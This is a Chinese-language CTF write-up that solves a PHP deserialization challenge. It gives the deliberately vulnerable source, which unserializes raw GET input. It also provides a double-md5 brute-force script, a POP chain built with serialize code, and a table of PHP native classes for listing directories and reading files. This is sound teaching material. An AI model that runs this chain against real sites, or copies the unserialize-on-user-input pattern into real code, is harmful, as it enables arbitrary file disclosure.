题目
<?php
error_reporting(0);class CherryBlossom {public $fruit1;public $fruit2;public function __construct($a) {$this->fruit1 = $a;}function __destruct() {echo $this->fruit1;}public function __toString() {$newFunc = $this->fruit2;return $newFunc();}
}class Forbidden {private $fruit3;public function __construct($string) {$this->fruit3 = $string;}public function __get($name) {$var = $this->$name;$var[$name]();}
}class Warlord {public $fruit4;public $fruit5;public $arg1;public function __call($arg1, $arg2) {$function = $this->fruit4;return $function();}public function __get($arg1) {$this->fruit5->ll2('b2');}
}class Samurai {public $fruit6;public $fruit7;public function __toString() {$long = @$this->fruit6->add();return $long;}public function __set($arg1, $arg2) {if ($this->fruit7->tt2) {echo "xxx are the best!!!";}}
}class Mystery {public function __get($arg1) {array_walk($this, function ($day1, $day2) {$day3 = new $day2($day1);foreach ($day3 as $day4) {echo ($day4 . '<br>');}});}
}class Princess {protected $fruit9;protected function addMe() {return "The time spent with xxx is my happiest time" . $this->fruit9;}public function __call($func, $args) {call_user_func([$this, $func . "Me"], $args);}
}class Philosopher {public $fruit10;public $fruit11="sr22kaDugamdwTPhG5zU";public function __invoke() {if (md5(md5($this->fruit11)) == 666) {return $this->fruit10->hey;}}
}class UselessTwo {public $hiddenVar = "123123";public function __construct($value) {$this->hiddenVar = $value;}public function __toString() {return $this->hiddenVar;}
}class Warrior {public $fruit12;private $fruit13;public function __set($name, $value) {$this->$name = $value;if ($this->fruit13 == "xxx") {strtolower($this->fruit12);}}
}class UselessThree {public $dummyVar;public function __call($name, $args) {return $name;}
}class UselessFour {public $lalala;public function __destruct() {echo "Hehe";}
}if (isset($_GET['GHCTF'])) {unserialize($_GET['GHCTF']);
} else {highlight_file(__FILE__);
}
这个一开始真没看出来是原生类的利用,光知道call_user_func()了
一些魔术方法再次复习:
- __call():当访问不存在的方法时调用
- __set():当给一个不存在的属性赋值的时候触发
- __get():当访问不存在的属性的时候调用
- __invoke():当把类当作函数调用的时候触发
双重md5加密绕过
if (md5(md5($this->fruit11)) == 666)ai写的脚本
import hashlib #可以进行md5计算(哈希)
import itertools #创建迭代器
def find_collision():chars = 'abcdefghijklmnopqrstuvwxyz0123456789'for s in itertools.product(chars, repeat=4): # 使用itertools.product函数生成所有可能的长度为 4 的字符串组合,根据计算力调整长度s = ''.join(s)first_hash = hashlib.md5(s.encode()).hexdigest()second_hash = hashlib.md5(first_hash.encode()).hexdigest()if second_hash.startswith('666') and not second_hash[3].isdigit():return sreturn Nonesolution = find_collision()
print(f"Payload: {solution}") # 输出符合要求的字符串爆破得 abe2 可以
pop链
CherryBlossom()--->Samurai()--->Warlord()--->Philosopher()--->Mystrey()__destruct() __toString() __call() __invoke() __get()fruit1 fruit6 fruit4 fruit10 $cb=new CherryBlossom();
$cb->fruit1=new Samurai();
$cb->fruit1->fruit6=new Warlord();
$cb->fruit1->fruit6->fruit4=new Philosopher();
$cb->fruit1->fruit6->fruit4->fruit10=new Mystery();echo serialize($cb);利用array_walk():
array_walk()用于遍历数组并对每个元素执行自定义的回调函数
在这里是:
array_walk($this, function ($day1, $day2) //day1是参数,day2是原生类
{$day3 = new $day2($day1); //实例化类 此时day3应该是数组之类的东西foreach ($day3 as $day4) {echo ($day4 . '<br>');}
});遍历类 $this,但是他是一个类不是数组,在php底层会将类转换成数组:
规则如下:
公共属性(
public):会被保留,键名为属性名,键值为属性值。受保护属性(
protected):键名前会添加\0*\0(空字符标记),例如\0*\0fruit9。私有属性(
private):键名前会添加\0类名\0,例如\0Forbidden\0fruit3。
也就是说这里如果自己设置一个属性,键值和键名都是我们来定义,就用到了php原生类
php常见原生类读取文件
| 名字 | 作用 | 举例 |
| DirectoryIterator | 查看文件系统目录(查看目录) | DirectoryIterator("/") |
| FilesystemIterator | 基本同上 | FilesystemIterator("/") |
| GlobIterator | 可以通过模式匹配来寻找文件路径 | GlobIterator("f*.txt")[知道文件部分名字] |
| SplFileObject | 文件内容的遍历、查找和操作(查看文件) | SplFileObject("/path/to/file.txt") |
查看目录用 DirectoryIterator 或者 FilesystemIterator 都行
查看文件用 SplFileObject
